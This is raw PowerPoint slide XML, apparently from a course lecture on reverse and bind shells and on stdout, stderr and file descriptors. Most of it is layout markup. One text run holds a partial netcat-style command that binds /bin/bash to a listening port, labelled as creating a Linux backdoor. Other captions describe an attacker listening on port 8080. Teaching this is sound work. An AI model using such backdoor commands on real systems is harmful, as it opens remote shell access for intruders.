                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880928" y="340707"/>
            <a:ext cx="2669320" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim sends signals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9131675" y="571540"/>
            <a:ext cx="418573" cy="39912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7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6985048" y="977022"/>
            <a:ext cx="3958088" cy="936221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B348BD-A2F6-402E-B0EF-FD6D02594ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="75456" y="0"/>
            <a:ext cx="5244883" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A84F03-3BE5-4BFF-9DA4-E19E32FD84AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229658" y="977022"/>
            <a:ext cx="2024732" cy="543867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker listens port 8080 first</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0BAF26-E70C-32CD-85C5-348CA092D882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2202412" y="69317"/>
            <a:ext cx="322920" cy="321480"/>
            <a:chOff x="2202412" y="69317"/>
            <a:chExt cx="322920" cy="321480"/>
          </a:xfrm>
        </p:grpSpPr>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A806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2344252" y="210437"/>
                <a:ext cx="23760" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2326612" y="192797"/>
                  <a:ext cx="5940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745D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2202412" y="69317"/>
                <a:ext cx="322920" cy="321480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2184772" y="51677"/>
                  <a:ext cx="358560" cy="357120"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADB0E17-734B-35F4-0483-1C8BF150F094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3133732" y="273437"/>
            <a:ext cx="5042880" cy="1345320"/>
            <a:chOff x="3133732" y="273437"/>
            <a:chExt cx="5042880" cy="1345320"/>
          </a:xfrm>
        </p:grpSpPr>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CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3133732" y="273437"/>
                <a:ext cx="4656600" cy="1259280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3115732" y="255437"/>
                  <a:ext cx="4692240" cy="1294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30E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7675492" y="1320677"/>
                <a:ext cx="162360" cy="298080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7657852" y="1302677"/>
                  <a:ext cx="19800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B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7877452" y="892277"/>
                <a:ext cx="147600" cy="241560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7859812" y="874277"/>
                  <a:ext cx="183240" cy="277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8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7727692" y="765557"/>
                <a:ext cx="448920" cy="477360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7710052" y="747557"/>
                  <a:ext cx="484560" cy="513000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E695CFF-1D2C-4273-1C31-6D7D48FECC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1822252" y="718757"/>
            <a:ext cx="5547600" cy="1025280"/>
            <a:chOff x="1822252" y="718757"/>
            <a:chExt cx="5547600" cy="1025280"/>
          </a:xfrm>
        </p:grpSpPr>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89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1894612" y="859157"/>
                <a:ext cx="5475240" cy="884880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876972" y="841157"/>
                  <a:ext cx="5510880" cy="920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9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1822252" y="718757"/>
                <a:ext cx="123840" cy="248400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1804252" y="700757"/>
                  <a:ext cx="159480" cy="284040"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760F4072-955C-7D20-F667-223D0A0BB030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2609572" y="577637"/>
            <a:ext cx="322200" cy="517680"/>
            <a:chOff x="2609572" y="577637"/>
            <a:chExt cx="322200" cy="517680"/>
          </a:xfrm>
        </p:grpSpPr>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8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2719372" y="758717"/>
                <a:ext cx="158760" cy="268200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="22" name="Ink 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2701732" y="741077"/>
                  <a:ext cx="19440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3" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2609572" y="577637"/>
                <a:ext cx="322200" cy="517680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2591932" y="559997"/>
                  <a:ext cx="357840" cy="553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
            <p14:nvContentPartPr>
              <p14:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827DF6C7-4049-53AB-E939-22D611165851}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11503732" y="3296357"/>
              <a:ext cx="360" cy="1800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827DF6C7-4049-53AB-E939-22D611165851}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId25"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11486092" y="3278717"/>
                <a:ext cx="3600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6" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D27415F-F638-7958-0F63-39073B0D9045}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11761852" y="3970277"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D27415F-F638-7958-0F63-39073B0D9045}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId27"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11744212" y="395227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7" name="Ink 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4485D2-763A-154F-9E32-3A29273361A0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11660332" y="4188797"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="Ink 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4485D2-763A-154F-9E32-3A29273361A0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId27"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11642692" y="4170797"/>
                <a:ext cx="36000" cy="36000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5800724" y="6382139"/>
            <a:ext cx="6391275"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9513569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Extra credits: Another approach for reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1819914"/>
            <a:ext cx="6971392" cy="4678170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8249336" y="1"/>
            <a:ext cx="3942664" cy="235898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="933" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949834CC-EE51-45E6-AC16-55466089F92B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8339015" y="4704862"/>
            <a:ext cx="2122761" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compare difference?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6425370"/>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385115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Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="1737116"/>
            <a:ext cx="9934927" cy="4814400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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There are two places programs send output to: Standard output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) and Standard Error (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</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You can redirect these outputs to a different place (like a file);</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File descriptors are used to identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (1) and </a:t>
